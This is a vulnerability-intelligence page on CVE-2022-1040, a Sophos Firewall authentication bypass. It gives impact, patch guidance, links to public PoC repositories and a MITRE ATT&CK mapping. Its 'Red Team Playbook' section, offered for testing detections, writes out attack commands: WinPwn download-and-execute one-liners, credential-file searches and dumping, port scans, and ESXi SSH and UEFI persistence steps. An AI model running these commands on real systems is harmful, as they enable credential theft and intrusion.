<\/head>

CVE-2022-1040

CRITICAL CISA KEV EXPLOIT POC TTE 41d Pub 25/03 Upd 21/10

Overview

This vulnerability is an authentication bypass in the Sophos Firewall User Portal and Webadmin interfaces. The root cause lies in improper validation of authentication tokens or session state, allowing unauthenticated requests to access privileged functionality. This flaw affects Sophos Firewall software versions 18.5 MR3 and earlier, specifically targeting the authentication mechanisms of the web management components.

Vulnerability Description

An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.

Impact

An attacker can remotely execute arbitrary code on the firewall without any authentication or user interaction, gaining full control over the device. This enables compromise of firewall configurations, interception or manipulation of network traffic, and potential lateral movement within the protected network. The vulnerability effectively allows complete system compromise of affected Sophos Firewall deployments, threatening enterprise network security and data confidentiality.

Solution

Sophos has released security updates addressing this issue in versions later than 18.5 MR3. Administrators should apply the latest patches as detailed in the Sophos Security Advisory available at https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce. No official workarounds are provided; immediate upgrading to the fixed version is recommended to mitigate exploitation risk.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The authentication bypass vulnerability in Sophos Firewall versions v18.5 MR3 and earlier presents a significant risk to network security. This flaw allows remote attackers to bypass authentication mechanisms, enabling them to execute arbitrary code on the affected systems. The underlying issue stems from improper validation of user input, which can be exploited to gain unauthorized access to the User Portal and Webadmin interfaces. Once an attacker successfully bypasses authentication, they can manipulate firewall settings, access sensitive data, and potentially compromise the entire network infrastructure.

Attack vectors for this vulnerability are varied, with the most straightforward being direct exploitation via the User Portal or Webadmin interfaces. An attacker could leverage automated tools or scripts to send crafted requests that exploit the authentication bypass. Given that these interfaces are often exposed to the internet, the attack surface is significantly broadened, allowing malicious actors to target organizations without prior access. Additionally, exploitation could be combined with social engineering tactics to increase the likelihood of success, such as phishing campaigns aimed at network administrators.

The real-world impact of this vulnerability can be profound, especially for organizations relying on Sophos Firewall for their network security. Successful exploitation could lead to unauthorized access to critical systems, data breaches, and the potential for lateral movement within the network. The business risks associated with such incidents include financial losses, reputational damage, and regulatory penalties, particularly for organizations handling sensitive customer information. The high CVSS score of 9.8 indicates that this vulnerability is not only critical but also requires immediate attention from affected organizations to mitigate potential fallout.

To detect and mitigate this vulnerability, organizations should prioritize immediate patching of affected systems, upgrading to the latest versions of Sophos Firewall that address this flaw. Regular vulnerability assessments and penetration testing should be conducted to identify any potential weaknesses in the network infrastructure. Additionally, implementing robust access controls, such as multi-factor authentication, can help reduce the risk of unauthorized access. Monitoring logs for unusual activity related to the User Portal and Webadmin can also aid in early detection of attempted exploitation, allowing organizations to respond swiftly to potential threats.

In conclusion, the authentication bypass vulnerability in Sophos Firewall represents a critical threat that necessitates urgent action from organizations utilizing this product. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare their defenses. Proactive measures, including timely patching, enhanced security protocols, and vigilant monitoring, are essential to safeguard against the risks posed by this vulnerability and to maintain the integrity of network security.




CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the authentication bypass vulnerability in Sophos Firewall. Our telemetry indicates a sharp increase in detection activity, accompanied by a rising Exploit Prediction Scoring System (EPSS) value, now approaching certainty of exploitation. This trend is further underscored by the emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms, lowering the barrier for threat actors to weaponize this vulnerability. Although ransomware usage linked to this flaw remains unconfirmed, the expanding exploit toolkit and heightened detection frequency suggest an elevated risk of opportunistic intrusions and potential lateral movement within compromised networks. Consequently, the threat landscape for CVE-2022-1040 has intensified, warranting heightened vigilance as adversaries gain easier access to firewall management interfaces, which could lead to severe operational disruptions and data breaches.



Update 2 — July 30, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2022-1040, with our telemetry indicating a doubling in detection frequency over recent monitoring periods. This surge coincides with the continued proliferation of publicly available proof-of-concept exploits on multiple code-sharing platforms, which lowers the technical barrier for adversaries to weaponize this critical authentication bypass vulnerability in Sophos Firewall. While ransomware deployment linked to this vulnerability remains unconfirmed, the increased exploitation activity heightens the risk of unauthorized remote code execution and subsequent network compromise. For defenders, this trend underscores an urgent need to prioritize monitoring and response efforts around firewall management interfaces, as attackers are increasingly leveraging these exploits to gain persistent footholds. The elevated exploitation pressure effectively raises the threat level from critical to actively exploited, signaling a transition from theoretical risk to tangible operational impact within affected environments.



Update 3 — August 17, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-1040, with telemetry indicating a doubling in observed activity over recent monitoring periods. This surge coincides with the emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms, lowering the barrier for adversaries to weaponize this critical authentication bypass vulnerability. Although ransomware involvement remains unconfirmed, the increased exploitation frequency significantly elevates the likelihood of unauthorized remote code execution within affected Sophos Firewall environments. For defenders, this intensification signals an urgent need to enhance vigilance around firewall management interfaces, as attackers are rapidly capitalizing on these vulnerabilities to establish persistent access. Consequently, the threat level for CVE-2022-1040 has shifted from critical to actively exploited, reflecting a transition from theoretical risk to confirmed operational impact that demands prioritized attention in network defense strategies.

Affected Products (1)

Vendor Product Version CPE
sophos Sophos Sfos All cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

ExploitDB (1)

Title Author Type Platform Date Link
Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass Aryan Chehreghani webapps hardware - View

GitHub PoCs (7)

Repository Author Stars Forks Date Link
jam620/Sophos-Vulnerability
CVE-2022-1040
jam620 18 5 2022-09-25 View
killvxk/CVE-2022-1040
may the poc with you
killvxk 16 2 2022-05-06 View
jackson5sec/CVE-2022-1040
This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authenti...
jackson5sec 2 3 2022-10-30 View
Keith-amateur/cve-2022-1040
Save the trouble to open the burpsuite...
Keith-amateur 3 0 2022-10-07 View
Cyb3rEnthusiast/CVE-2022-1040
New exploitation of 2020 Sophos vuln
Cyb3rEnthusiast 1 0 2023-09-26 View
michealadams30/CVE-2022-1040
Sophos EXploit
michealadams30 0 1 2023-01-08 View
xMr110/CVE-2022-1040
xMr110 0 0 2024-02-05 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

12 events
2026-08-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2022-05-06
PoC Published (7 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2022-03-31
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

Exploit Published (1 ExploitDB, 0 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
95% auth_bypass
Privilege Escalation
35% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns

No CAPEC pattern mapped to this CVE.

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (5)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2022-1040
sophos.com
GitHub CVE x_refsource_CONFIRM
https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/168046/Sophos-XG115w-Firewall-17.0.10-MR-10-Authentication-Bypass.html
exploit-db.com
GitHub CVE x_refsource_MISC
https://www.exploit-db.com/exploits/51006
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-1040